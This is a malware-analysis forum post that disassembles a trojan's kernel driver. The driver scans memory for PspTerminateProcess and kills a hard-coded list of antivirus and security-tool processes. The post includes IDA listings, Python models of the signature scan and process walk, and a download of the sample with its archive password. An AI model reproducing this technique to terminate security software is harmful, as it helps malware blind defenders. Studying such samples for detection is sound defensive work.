The one I posted yesterday got judged a YJ post... hope this one won't be...
The trojan is fairly simple and suitable for beginners.
First, the behaviour: the exe drops three files, Pcix32.sys, amd32_.sys and atax32.sys, but the last two are just copies of the first. The sys file is responsible for watching for the start of various antivirus and security tools, and kills them the moment it sees one.
1. exe behaviour
I'll only sketch the approach here; for the details, see the idb file and trace it yourself, heh.
First it gets the system drivers directory, then drops Pcix32.sys into it, making the various copies along the way.
The exe also checks whether 还原精灵 (a disk-restore tool) is present and, if so, deals with it accordingly, but I'm too lazy... couldn't be bothered to set up the environment; anyone interested can trace that part :)
If 还原精灵 is not present, it loads the driver.
Finally there is an injection step, which I didn't trace closely either :D
2. sys
This is the interesting part; here is the code:
Code:
.text:00010B34  lea   eax, [ebp+SystemInformation]
.text:00010B37  push  eax                            ; ReturnLength
.text:00010B38  push  0                              ; SystemInformationLength
.text:00010B3A  push  eax                            ; SystemInformation
.text:00010B3B  push  0Bh                            ; SystemInformationClass
.text:00010B3D  mov   edi, ds:__imp_ZwQuerySystemInformation
.text:00010B43  call  edi                            ; __imp_ZwQuerySystemInformation
.text:00010B45  push  [ebp+SystemInformation]        ; NumberOfBytes
.text:00010B48  push  1                              ; PoolType
.text:00010B4A  call  ds:ExAllocatePool
Code:
.text:00010B5A  push  0                              ; ReturnLength
.text:00010B5C  push  [ebp+SystemInformation]        ; SystemInformationLength
.text:00010B5F  push  esi                            ; SystemInformation
.text:00010B60  push  0Bh                            ; SystemInformationClass
.text:00010B62  call  edi                            ; __imp_ZwQuerySystemInformation
.text:00010B64  test  eax, eax
.text:00010B66  jl    short loc_10BDE
.text:00010B68  mov   ebx, [esi+0Ch]
.text:00010B6B  mov   edi, [esi+10h]
.text:00010B6E  add   edi, ebx
.text:00010B70  push  0                              ; Tag
.text:00010B72  push  esi                            ; P
.text:00010B73  call  ds:ExFreePoolWithTag
.text:00010B79  mov   esi, ebx
.text:00010B7B
.text:00010B7B  loc_10B7B:                           ; CODE XREF: sub_10B28+BFj
.text:00010B7B  cmp   esi, edi
.text:00010B7D  ja    short loc_10BDE
.text:00010B7F  push  esi                            ; VirtualAddress
.text:00010B80  call  ds:MmIsAddressValid
.text:00010B86  test  al, al
.text:00010B88  jz    short loc_10BE6
.text:00010B8A  lea   ebx, [esi+4]
.text:00010B8D  push  ebx                            ; VirtualAddress
.text:00010B8E  call  ds:MmIsAddressValid            ; check the address is usable, to avoid a BSOD...
.text:00010B94  test  al, al
.text:00010B96  jz    short loc_10BE6
.text:00010B98  mov   eax, 8B55FF8Bh                 ; google this value: it turns out to be PspTerminateProcess
.text:00010B9D  cmp   [esi], eax
.text:00010B9F  jnz   short loc_10BE6
.text:00010BA1  mov   eax, 0CEC83ECh
.text:00010BA6  cmp   [ebx], eax
.text:00010BA8  jnz   short loc_10BE6
.text:00010BAA  mov   eax, 0FFF84D83h
.text:00010BAF  cmp   [esi+8], eax
.text:00010BB2  jnz   short loc_10BE6
.text:00010BB4  mov   eax, 7D8B5756h
.text:00010BB9  cmp   [esi+0Ch], eax
.text:00010BBC  jnz   short loc_10BE6
.text:00010BBE  and   [ebp+ms_exc.disabled], 0
.text:00010BC2  mov   [ebp+var_20], esi
.text:00010BC5  mov   [ebp+ms_exc.disabled], 0FFFFFFFEh
.text:00010BCC  mov   eax, esi                       ; save the function address
Code:
.text:00010A40  call  _GetPspTerminateProcessAddress
.text:00010A45  mov   PspTerminateProcess, eax
.text:00010A4A  test  eax, eax
.text:00010A4C  jnz   short loc_10A8F
.text:00010A4E  call  sub_10568
Code:
sub_10568 proc near                                  ; CODE XREF: sub_10A30+1Ep
.text:00010568  push  offset aPsterminatesys         ; "PsTerminateSystemThread"
.text:0001056D  push  sysInfo
.text:00010573  call  sub_10486
.text:00010578  xor   ecx, ecx
.text:0001057A
.text:0001057A  loc_1057A:                           ; CODE XREF: sub_10568+28j
.text:0001057A  cmp   byte ptr [eax], 0FFh           ; 0xFF7508, i.e. PspTerminateProcess
.text:0001057D  jnz   short loc_1058B
.text:0001057F  cmp   byte ptr [eax+1], 75h
.text:00010583  jnz   short loc_1058B
.text:00010585  cmp   byte ptr [eax+2], 8
.text:00010589  jz    short loc_10595
...
.text:00010595  loc_10595:                           ; CODE XREF: sub_10568+21j
.text:00010595  add   eax, 5
.text:00010598  mov   ecx, [eax]
.text:0001059A  lea   eax, [ecx+eax+4]
.text:0001059E  retn
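The four immediates compared at loc_10B7B are easier to understand as bytes. The following is an added example (not code from the post or the sample) that decodes them, reproduces the compare over a constructed module image, and shows how the same constants can be used as a static triage indicator for a dumped driver. The one-byte step of the scan is an assumption (the increment at loc_10BE6 is not in the listing); all data is constructed and no kernel memory is touched.

```python
"""Added example, not code from the original post: decode the four immediates the
driver compares at loc_10B7B and reproduce the match on constructed data only."""
import struct
from typing import Optional

# Constants loaded with mov eax, imm32 and compared at [esi], [esi+4], [esi+8], [esi+0Ch].
SIGNATURE_DWORDS = (0x8B55FF8B, 0x0CEC83EC, 0xFFF84D83, 0x7D8B5756)

def signature_bytes() -> bytes:
    """Little-endian packing yields the byte string actually being compared:
    8B FF 55 8B EC 83 EC 0C 83 4D F8 FF 56 57 8B 7D, which decodes to the prologue
    mov edi,edi / push ebp / mov ebp,esp / sub esp,0Ch / or [ebp-8],-1 /
    push esi / push edi / mov edi,[ebp+..]. That is the PspTerminateProcess
    prologue the author found by googling the value."""
    return struct.pack("<4I", *SIGNATURE_DWORDS)

def scan_image(image: bytes, image_base: int) -> Optional[int]:
    """Compare across [ImageBase, ImageBase+ImageSize) one byte at a time (assumed step);
    only offsets where all 16 bytes lie inside the image are tested, which is what the
    MmIsAddressValid calls guard against in the driver. Returns the virtual address."""
    sig = signature_bytes()
    for off in range(len(image) - len(sig) + 1):
        if image[off:off + len(sig)] == sig:
            return image_base + off
    return None

def has_locator_immediates(driver: bytes) -> bool:
    """Static triage check for a dumped driver: all four constants present as
    'mov eax, imm32' (opcode B8 + little-endian imm32) strongly suggests this
    PspTerminateProcess locator routine is compiled in."""
    return all(b"\xb8" + struct.pack("<I", d) in driver for d in SIGNATURE_DWORDS)

# Constructed test data: a fake module with the prologue at offset 40, and a fake
# driver fragment carrying the four mov eax, imm32 instructions back to back.
SAMPLE_IMAGE = b"\x90" * 40 + signature_bytes() + b"\xcc" * 8
SAMPLE_DRIVER = b"\x00" * 8 + b"".join(b"\xb8" + struct.pack("<I", d) for d in SIGNATURE_DWORDS)
```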
Below is the find-and-kill function, the culprit that does the dirty work:
Code:
.text:00010CEC  mov   edi, edi
.text:00010CEE  push  ebp
.text:00010CEF  mov   ebp, esp
.text:00010CF1  sub   esp, 6A4h
.text:00010CF7  and   [ebp+var_C], 0
.text:00010CFB  push  ebx
.text:00010CFC  push  esi
.text:00010CFD  push  edi
.text:00010CFE  mov   esi, 0FFFFh
.text:00010D03  push  esi                            ; NumberOfBytes
.text:00010D04  mov   ebx, offset aKvmonxp_exe       ; "KVMonXp.exe"
.text:00010D09  push  1                              ; PoolType
.text:00010D0B  mov   [ebp+SourceString], offset aNod32krn_exe ; "nod32krn.exe"
.text:00010D15  mov   [ebp+var_C0], offset aEgui_exe ; "egui.exe"
.text:00010D1F  mov   [ebp+var_BC], offset aEkrn_exe ; "ekrn.exe"
.text:00010D29  mov   [ebp+var_B8], offset a360tray_exe ; "360tray.exe"
.text:00010D33  mov   [ebp+var_B4], offset a360safe_exe ; "360Safe.exe"
.text:00010D3D  mov   [ebp+var_B0], offset aSafeboxtray_ex ; "safeboxTray.exe"
.text:00010D47  mov   [ebp+var_AC], offset a360safebox_exe ; "360safebox.exe"
.text:00010D51  mov   [ebp+var_A8], offset a360sd_exe ; "360sd.exe"
.text:00010D5B  mov   [ebp+var_A4], offset aZhudongfangyu_ ; "ZhuDongFangYu.exe"
.text:00010D65  mov   [ebp+var_A0], offset a360rp_exe ; "360rp.exe"
.text:00010D6F  mov   [ebp+var_9C], offset a360sdupd_exe ; "360sdupd.exe"
.text:00010D79  mov   [ebp+var_98], offset a360rps_exe ; "360rps.exe"
.text:00010D83  mov   [ebp+var_94], offset a3_0      ; "3"
.text:00010D8D  mov   [ebp+var_90], offset aO        ; "O"
.text:00010D97  mov   [ebp+var_8C], offset asc_11BDE ; "L"
.text:00010DA1  mov   [ebp+var_88], offset aK_8      ; "K"
.text:00010DAB  mov   [ebp+var_84], offset aK_7      ; "k"
.text:00010DB5  mov   [ebp+var_80], offset aK_6      ; "k"
.text:00010DBC  mov   [ebp+var_7C], offset aK_5      ; "k"
.text:00010DC3  mov   [ebp+var_78], offset aK_4      ; "k"
.text:00010DCA  mov   [ebp+var_74], offset aU        ; "u"
.text:00010DD1  mov   [ebp+var_70], offset aKxescore_exe ; "kxescore.exe"
.text:00010DD8  mov   [ebp+var_6C], offset aKxetray_exe ; "kxetray.exe"
.text:00010DDF  mov   [ebp+var_68], offset aK_3      ; "K"
.text:00010DE6  mov   [ebp+var_64], offset aK        ; "K"
.text:00010DED  mov   [ebp+var_60], offset aGuiyingfix_exe ; "guiyingfix.exe"
.text:00010DF4  mov   [ebp+var_5C], offset aRavmond_exe ; "RavMonD.exe"
.text:00010DFB  mov   [ebp+var_58], offset aR_3      ; "R"
.text:00010E02  mov   [ebp+var_54], offset aR        ; "R"
.text:00010E09  mov   [ebp+var_50], offset aRegguide_exe ; "RegGuide.exe"
.text:00010E10  mov   [ebp+var_4C], offset aR_0      ; "R"
.text:00010E17  mov   [ebp+var_48], offset aRscopy_exe ; "RsCopy.exe"
.text:00010E1E  mov   [ebp+var_44], offset aRav_exe  ; "Rav.exe"
.text:00010E25  mov   [ebp+var_40], offset aKvsrvxp_exe ; "KVSrvXP.exe"
.text:00010E2C  mov   [ebp+var_3C], offset word_119F2
.text:00010E33  mov   [ebp+var_38], ebx
.text:00010E36  mov   [ebp+var_34], offset aA        ; "a"
.text:00010E3D  mov   [ebp+var_30], offset aIcesword_exe ; "IceSword.exe"
.text:00010E44  mov   [ebp+var_2C], offset aS_0      ; "S"
.text:00010E4B  mov   [ebp+var_28], offset aR_1      ; "r"
.text:00010E52  mov   [ebp+var_24], offset aKnownsvr_exe ; "knownsvr.exe"
.text:00010E59  mov   [ebp+var_20], offset aR_2      ; "r"
.text:00010E60  mov   [ebp+var_1C], offset aKnsdtray_exe ; "knsdtray.exe"
.text:00010E67  mov   [ebp+var_18], offset aK_2      ; "k"
.text:00010E6E  mov   [ebp+var_14], offset aK_1      ; "k"
.text:00010E75  mov   [ebp+var_10], offset aK_0      ; "k"
.text:00010E7C  call  ds:ExAllocatePool
.text:00010E82  mov   edi, eax
.text:00010E84  mov   [ebp+P], edi
.text:00010E87  test  edi, edi
.text:00010E89  jz    loc_10FA5
.text:00010E8F  push  offset Format                  ; "enter findprocessandkill\n"
.text:00010E94  call  DbgPrint
.text:00010E99  pop   ecx
.text:00010E9A  lea   eax, [ebp+ReturnLength]
.text:00010E9D  push  eax                            ; ReturnLength
.text:00010E9E  push  esi                            ; SystemInformationLength
.text:00010E9F  push  edi                            ; SystemInformation
.text:00010EA0  push  5                              ; SystemInformationClass
.text:00010EA2  call  ds:__imp_ZwQuerySystemInformation
.text:00010EA8  mov   esi, edi
.text:00010EAA
.text:00010EAA  loc_10EAA:                           ; CODE XREF: _FindAddKillProcess+2A8j
.text:00010EAA  add   esi, [esi]
.text:00010EAC  xor   eax, eax
.text:00010EAE  lea   edi, [esi+38h]
.text:00010EB1  cmp   [edi], ax
.text:00010EB4  jz    loc_10F91
.text:00010EBA  mov   [ebp+ReturnLength], eax
.text:00010EBD
.text:00010EBD  loc_10EBD:                           ; CODE XREF: _FindAddKillProcess+29Fj
.text:00010EBD  push  [ebp+eax*4+SourceString]       ; SourceString
.text:00010EC4  lea   eax, [ebp+eax*8+DestinationString]
.text:00010ECB  push  eax                            ; DestinationString
.text:00010ECC  call  ds:RtlInitUnicodeString
.text:00010ED2  mov   eax, [ebp+ReturnLength]
.text:00010ED5  push  1                              ; CaseInSensitive
.text:00010ED7  lea   eax, [ebp+eax*8+DestinationString]
.text:00010EDE  push  eax                            ; String2
.text:00010EDF  push  edi                            ; String1
.text:00010EE0  call  ds:RtlCompareUnicodeString
.text:00010EE6  test  eax, eax
.text:00010EE8  jnz   loc_10F7C
.text:00010EEE  mov   eax, [ebp+ReturnLength]
.text:00010EF1  push  offset aKvsrvxp_exe            ; "KVSrvXP.exe"
.text:00010EF6  push  [ebp+eax*4+SourceString]       ; wchar_t *
.text:00010EFD  call  ds:_wcsicmp
.text:00010F03  pop   ecx
.text:00010F04  pop   ecx
.text:00010F05  test  eax, eax
.text:00010F07  jz    short loc_10F75
.text:00010F09  mov   eax, [ebp+ReturnLength]
.text:00010F0C  push  offset word_119F2              ; wchar_t *
.text:00010F11  push  [ebp+eax*4+SourceString]       ; wchar_t *
.text:00010F18  call  ds:_wcsicmp
.text:00010F1E  pop   ecx
.text:00010F1F  pop   ecx
.text:00010F20  test  eax, eax
.text:00010F22  jz    short loc_10F75
.text:00010F24  mov   eax, [ebp+ReturnLength]
.text:00010F27  push  ebx                            ; wchar_t *
.text:00010F28  push  [ebp+eax*4+SourceString]       ; wchar_t *
.text:00010F2F  call  ds:_wcsicmp
.text:00010F35  pop   ecx
.text:00010F36  pop   ecx
.text:00010F37  test  eax, eax
.text:00010F39  jz    short loc_10F75
.text:00010F3B  mov   eax, [ebp+ReturnLength]
.text:00010F3E  push  [ebp+eax*4+SourceString]
.text:00010F45  push  offset aFindProcesssWs         ; "Find Processs: %ws\n"
.text:00010F4A  call  DbgPrint
.text:00010F4F  pop   ecx
.text:00010F50  pop   ecx
.text:00010F51  push  dword ptr [esi+44h]            ; PEPROCESS
.text:00010F54  call  KillProcess
.text:00010F59  test  eax, eax
.text:00010F5B  jl    short loc_10F7C
.text:00010F5D  mov   eax, [ebp+ReturnLength]
.text:00010F60  push  [ebp+eax*4+SourceString]
.text:00010F67  push  offset aKillProcesssWs         ; "Kill Processs: %ws OK!\n"
.text:00010F6C  call  DbgPrint
.text:00010F71  pop   ecx
.text:00010F72  pop   ecx
.text:00010F73  jmp   short loc_10F7C
.text:00010F75 ; ---------------------------------------------------------------------------
.text:00010F75
.text:00010F75  loc_10F75:                           ; CODE XREF: _FindAddKillProcess+21Bj
.text:00010F75                                       ; _FindAddKillProcess+236j ...
.text:00010F75  mov   byte_1212C, 1
.text:00010F7C
.text:00010F7C  loc_10F7C:                           ; CODE XREF: _FindAddKillProcess+1FCj
.text:00010F7C                                       ; _FindAddKillProcess+26Fj ...
.text:00010F7C  mov   eax, [ebp+ReturnLength]
.text:00010F7F  inc   eax
.text:00010F80  cmp   [ebp+eax*4+SourceString], 0
.text:00010F88  mov   [ebp+ReturnLength], eax
.text:00010F8B  jnz   loc_10EBD
.text:00010F91
.text:00010F91  loc_10F91:                           ; CODE XREF: _FindAddKillProcess+1C8j
.text:00010F91  cmp   dword ptr [esi], 0
.text:00010F94  jnz   loc_10EAA
.text:00010F9A  push  0                              ; Tag
.text:00010F9C  push  [ebp+P]                        ; P
.text:00010F9F  call  ds:ExFreePoolWithTag
.text:00010FA5
.text:00010FA5  loc_10FA5:                           ; CODE XREF: _FindAddKillProcess+19Dj
.text:00010FA5  pop   edi
.text:00010FA6  pop   esi
.text:00010FA7  pop   ebx
.text:00010FA8  leave
.text:00010FA9  retn
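To make the loop above concrete, here is an added model (not the driver's code) of the same walk in Python over a constructed SystemProcessInformation (class 5) buffer, so the matching can be studied offline. Offsets come from the listing: NextEntryOffset at +0, the ImageName UNICODE_STRING at +38h and, at +44h, the UniqueProcessId that KillProcess then hands to PsLookupProcessByProcessId. Note that three names (KVSrvXP.exe, word_119F2 and KVMonXp.exe) only set byte_1212C instead of going to KillProcess; word_119F2 and the single-letter strings are unreadable in the dump and are left out. The fixed record size, the fake pool base and the sample process list are constructed.

```python
"""Added example, not the driver's own code: replay the loc_10EAA / loc_10EBD loop
over a constructed SystemProcessInformation buffer. Offsets are from the listing;
record size, pool base and sample data are constructed."""
import struct

# Process names visible in the listing (word_119F2 and one-letter strings left out).
KILL_LIST = [
    "nod32krn.exe", "egui.exe", "ekrn.exe", "360tray.exe", "360Safe.exe",
    "safeboxTray.exe", "360safebox.exe", "360sd.exe", "ZhuDongFangYu.exe",
    "360rp.exe", "360sdupd.exe", "360rps.exe", "kxescore.exe", "kxetray.exe",
    "guiyingfix.exe", "RavMonD.exe", "RegGuide.exe", "RsCopy.exe", "Rav.exe",
    "KVSrvXP.exe", "KVMonXp.exe", "IceSword.exe", "knownsvr.exe", "knsdtray.exe",
]
FLAG_ONLY = {"kvsrvxp.exe", "kvmonxp.exe"}   # these set byte_1212C instead of KillProcess
ENTRY_SIZE = 0xB8                              # fixed part of each record (constructed)
BASE = 0x81000000                              # fake pool address for Buffer pointers

def build_buffer(procs) -> bytes:
    """Constructed buffer: each record is the fixed struct followed by its UTF-16 name,
    with ImageName.Buffer pointing at that name and NextEntryOffset chaining records."""
    out = bytearray()
    for i, (name, pid) in enumerate(procs):
        raw = name.encode("utf-16-le") + b"\x00\x00"
        rec = bytearray(ENTRY_SIZE)
        struct.pack_into("<I", rec, 0x00, 0 if i == len(procs) - 1 else ENTRY_SIZE + len(raw))
        struct.pack_into("<HHI", rec, 0x38, len(raw) - 2, len(raw), BASE + len(out) + ENTRY_SIZE)
        struct.pack_into("<I", rec, 0x44, pid)
        out += rec + raw
    return bytes(out)

def find_targets(buf: bytes):
    """Walk exactly as the driver does: 'add esi,[esi]' runs before any check, so the
    first record is never examined; names compare case-insensitively
    (RtlCompareUnicodeString, CaseInSensitive=1); NextEntryOffset == 0 ends the walk."""
    wanted = {n.lower() for n in KILL_LIST}
    actions, pos = [], 0
    while True:
        pos += struct.unpack_from("<I", buf, pos)[0]
        length, _, ptr = struct.unpack_from("<HHI", buf, pos + 0x38)
        if length:                                  # cmp [edi], ax: empty name is skipped
            name = buf[ptr - BASE:ptr - BASE + length].decode("utf-16-le")
            if name.lower() in wanted:
                pid = struct.unpack_from("<I", buf, pos + 0x44)[0]
                actions.append((pid, name, "flag" if name.lower() in FLAG_ONLY else "kill"))
        if struct.unpack_from("<I", buf, pos)[0] == 0:
            return actions

# Constructed sample: System is skipped as the first record, notepad is not listed,
# the lower-case KV name exercises the case-insensitive match, Rav.exe is the last record.
SAMPLE_PROCS = [("System", 4), ("360tray.exe", 1234), ("notepad.exe", 777),
                ("kvmonxp.exe", 2001), ("Rav.exe", 3000)]
```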
Heh, let's look at how it kills:
Code:
KillProcess proc near                                ; CODE XREF: _FindAddKillProcess+268p
.text:00010CB0
.text:00010CB0  PEPROCESS = dword ptr 8
.text:00010CB0
.text:00010CB0  mov   edi, edi
.text:00010CB2  push  ebp
.text:00010CB3  mov   ebp, esp
.text:00010CB5  lea   eax, [ebp+PEPROCESS]
.text:00010CB8  push  eax
.text:00010CB9  push  [ebp+PEPROCESS]
.text:00010CBC  call  PsLookupProcessByProcessId
.text:00010CC1  test  eax, eax
.text:00010CC3  jl    short loc_10CCE
.text:00010CC5  mov   ecx, [ebp+PEPROCESS]           ; Object
.text:00010CC8  call  ds:ObfDereferenceObject
.text:00010CCE
.text:00010CCE  loc_10CCE:                           ; CODE XREF: KillProcess+13j
.text:00010CCE  push  [ebp+PEPROCESS]
.text:00010CD1  call  sub_10C4E
.text:00010CD6  test  eax, eax
.text:00010CD8  jl    short loc_10CDE
.text:00010CDA  xor   eax, eax
.text:00010CDC  jmp   short loc_10CE3
.text:00010CDE ; ---------------------------------------------------------------------------
.text:00010CDE
.text:00010CDE  loc_10CDE:                           ; CODE XREF: KillProcess+28j
.text:00010CDE  mov   eax, 0C0000001h
.text:00010CE3
.text:00010CE3  loc_10CE3:                           ; CODE XREF: KillProcess+2Cj
.text:00010CE3  pop   ebp
.text:00010CE4  retn  4
.text:00010CE4  KillProcess endp
Code:
.text:00010C50  push  offset unk_12088
.text:00010C55  call  __SEH_prolog4
.text:00010C5A  xor   edi, edi
.text:00010C5C  mov   [ebp+var_1C], edi
.text:00010C5F  mov   [ebp+ms_exc.disabled], edi
.text:00010C62  push  edi                            ; Object
.text:00010C63
.text:00010C63  loc_10C63:                           ; CODE XREF: sub_10C4E+32j
.text:00010C63  push  [ebp+PEPROCESS]                ; PEPROCESS
.text:00010C66  call  sub_10BEE
.text:00010C6B  mov   esi, eax
.text:00010C6D  cmp   esi, edi
.text:00010C6F  jz    short loc_10C99
.text:00010C71  mov   [ebp+var_1C], edi
.text:00010C74  push  edi
.text:00010C75  push  esi
.text:00010C76  call  PspTerminateProcess
.text:00010C7C  mov   [ebp+var_1C], eax
.text:00010C7F  push  esi
.text:00010C80  jmp   short loc_10C63
.text:00010C82 ; ---------------------------------------------------------------------------
.text:00010C82
.text:00010C82  loc_10C82:                           ; DATA XREF: .rdata:0001209Co
.text:00010C82  mov   eax, [ebp+ms_exc.exc_ptr]
.text:00010C85  mov   eax, [eax]
.text:00010C87  mov   eax, [eax]
.text:00010C89  mov   [ebp+var_20], eax
.text:00010C8C  xor   eax, eax
.text:00010C8E  inc   eax
.text:00010C8F  retn
.text:00010C90 ; ---------------------------------------------------------------------------
.text:00010C90
.text:00010C90  loc_10C90:                           ; DATA XREF: .rdata:000120A0o
.text:00010C90  mov   esp, [ebp+ms_exc.old_esp]
.text:00010C93  mov   eax, [ebp+var_20]
.text:00010C96  mov   [ebp+var_1C], eax
.text:00010C99
.text:00010C99  loc_10C99:                           ; CODE XREF: sub_10C4E+21j
.text:00010C99  mov   [ebp+ms_exc.disabled], 0FFFFFFFEh
.text:00010CA0  mov   eax, [ebp+var_1C]
.text:00010CA3  call  __SEH_epilog4
.text:00010CA8  retn  4
.text:00010CA8  sub_10C4E endp
Archive password: pediy
Virus.rar